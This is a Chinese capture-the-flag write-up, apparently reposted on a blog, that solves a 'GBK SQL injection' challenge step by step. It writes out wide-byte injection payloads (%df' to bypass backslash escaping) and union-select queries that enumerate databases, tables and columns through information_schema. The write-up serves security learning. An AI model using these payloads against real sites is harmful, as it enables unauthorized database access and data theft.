南邮ctf mysql_南邮CTF--SQL注入题
南郵CTF--SQL注入題
題目:GBK SQL injection
解析:
1.判斷注入點(diǎn):加入單引號發(fā)現(xiàn)被反斜杠轉(zhuǎn)移掉了,換一個(gè),看清題目,GBK,接下來利用寬字節(jié)進(jìn)行注入
2.使用‘%df‘ ‘進(jìn)行注入,emm報(bào)錯(cuò),于是加入老手段,and 1=1 %23,ok,沒報(bào)錯(cuò),說明成功
3.繼續(xù)改參數(shù),1=2時(shí),沒有任何信息,找到注入點(diǎn)
4.利用order by 查詢列數(shù),當(dāng)查詢2時(shí),顯示正常,那么查詢3時(shí),顯示錯(cuò)誤,確定為2列。
5.既然查詢到列,使用聯(lián)合查詢,union select 1,2 %23,
6.獲取當(dāng)前數(shù)據(jù)庫:union select 1,database() %23
7.獲取當(dāng)前數(shù)據(jù)庫名: id=1%df‘ and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23
group_concat(table_name) 分組以后,把想要顯示的列通過gruop_concat()函數(shù)拼接在一起。
information_schema.TABLES 切說是信息數(shù)據(jù)庫。其中保存著關(guān)于MySQL服務(wù)器所維護(hù)的所有其他數(shù)據(jù)庫的信息。如數(shù)據(jù)庫名,數(shù)據(jù)庫的表,表欄的數(shù)據(jù)類型與訪問權(quán)限等。
8.獲取表名(ctf-4)id=1%df‘ and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23
總結(jié)
以上是生活随笔為你收集整理的南邮ctf mysql_南邮CTF--SQL注入题的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: js距离米转换为千米_千米的换算题(千米
- 下一篇: Mysql数据库实现主从数据库同步更新